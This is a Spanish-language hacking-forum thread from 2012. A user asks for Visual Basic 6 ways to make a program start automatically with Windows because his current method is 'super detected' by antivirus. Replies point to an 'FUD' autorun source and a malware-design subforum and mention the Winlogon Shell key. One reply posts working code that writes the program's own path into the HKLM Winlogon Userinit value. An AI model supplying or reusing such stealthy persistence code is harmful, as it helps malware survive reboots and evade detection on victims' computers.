elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Ayuda AutoRuns
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda AutoRuns  (Leído 2,026 veces)
MrSatan

Desconectado Desconectado

Mensajes: 7



Ver Perfil
Ayuda AutoRuns
« en: 28 Diciembre 2012, 22:17 pm »

 Hola queria saber si me darian algunas formas de crear autoruns desde vb6 ya que la que uso es muy simple y super detectada por eso quiero saber si hay otras formas...

Gracias.


En línea

BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: Ayuda AutoRuns
« Respuesta #1 en: 28 Diciembre 2012, 23:42 pm »

.
[Src] Autorun.inf FUD (Pensaste que ya no servia LOL).

Dulces Lunas!¡.


En línea

The Dark Shadow is my passion.
MrSatan

Desconectado Desconectado

Mensajes: 7



Ver Perfil
Re: Ayuda AutoRuns
« Respuesta #2 en: 29 Diciembre 2012, 03:41 am »


Muchas gracias por comentar esa también la conocia ahora probe una que se crea en
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"    si alguno tiene otras y las quiere compartir me viene de 10.

un saludo.      
En línea

BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: Ayuda AutoRuns
« Respuesta #3 en: 29 Diciembre 2012, 08:39 am »

.
@MrSatan
Existe un botón llamado Buscar!¡.

Aun así esta duda es mas sobre INFORMACIÓN que de código (independientemente del lenguaje).

Análisis y Diseño de Malware
[Recopilatorio] Herramientas, manuales y códigos de los usuarios (Construcción).

Windows
F.A.Q.

No recuerdo donde leí lo de inicio por ActiveX, runonce (varios inicios por registro de windows), entre otros (puede que haya sido en el Sub-Foro de Windows o de Análisis de Diseño de Malware).

Dulces Lunas!¡.
« Última modificación: 29 Diciembre 2012, 09:10 am por BlackZeroX (Astaroth) » En línea

The Dark Shadow is my passion.
Danyfirex


Desconectado Desconectado

Mensajes: 493


My Dear Mizuho


Ver Perfil
Re: Ayuda AutoRuns
« Respuesta #4 en: 29 Diciembre 2012, 17:52 pm »

esta la hice hace tiempo no se como este de detecciones :S


Código
  1. Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal HKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, ByRef phkResult As Long) As Long
  2. Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal HKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
  3. Private Declare Function RegCloseKey Lib "advapi32" (ByVal HKey As Long) As Long
  4.  
  5.  
  6. Private Const HKEY_CURRENT_USER = &H80000001
  7. Private Const HKEY_LOCAL_MACHINE = &H80000002
  8. Private Const KEY_WRITE = &H20006
  9. Private Const REG_SZ = 1
  10.  
  11.  
  12.  
  13. Private Sub Dosyayi_Baslangica_Ekle(ByVal HKey As Long, ByVal MKey As String, ByVal stringKeyVal As String, ByVal subkey As String)
  14. Dim HRKey As Long, StrB As String
  15. Dim retval As Long
  16.    retval = RegOpenKeyEx(HKey, subkey, 0, KEY_WRITE, HRKey)
  17.        If retval <> 0 Then
  18.            Exit Sub
  19.        End If
  20.    StrB = stringKeyVal & vbNullChar
  21.    retval = RegSetValueEx(HRKey, MKey, 0, REG_SZ, ByVal StrB, Len(StrB))
  22.    RegCloseKey HRKey
  23. End Sub
  24.  
  25. Private Sub Command1_Click()
  26.  
  27. Dim sMyPath As String
  28.  
  29. file = "C:\Users\Pink\Desktop\Anotador.exe"
  30. sMyPath = (App.Path & "\" & App.EXEName & ".exe")
  31. Call Dosyayi_Baslangica_Ekle(HKEY_LOCAL_MACHINE, "Userinit", "C:\Windows\system32\userinit.exe," & sMyPath, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon")
  32.  
  33. End Sub


Saludos
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Como crear un Menu de Autoruns en un CD
Software
Vladimir V 2 2,070 Último mensaje 30 Septiembre 2005, 17:33 pm
por DarkM
Ayuda por davor ayuda os ruego ayuda XD (SOLUCIONADO)
Hardware
XxRekcahlExX 6 10,579 Último mensaje 24 Mayo 2010, 00:56 am
por Aprendiz-Oscuro
Autoruns 10.03: alternativa gratuita y complementaria al comando msconfig
Software
wolfbcn 0 2,475 Último mensaje 30 Septiembre 2010, 22:24 pm
por wolfbcn
Autoruns 11.32: Alternativa al msconfig para quitar procesos innecesarios del...
Noticias
wolfbcn 1 1,743 Último mensaje 29 Junio 2012, 14:26 pm
por --<<<@u6u$t0>>>--
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines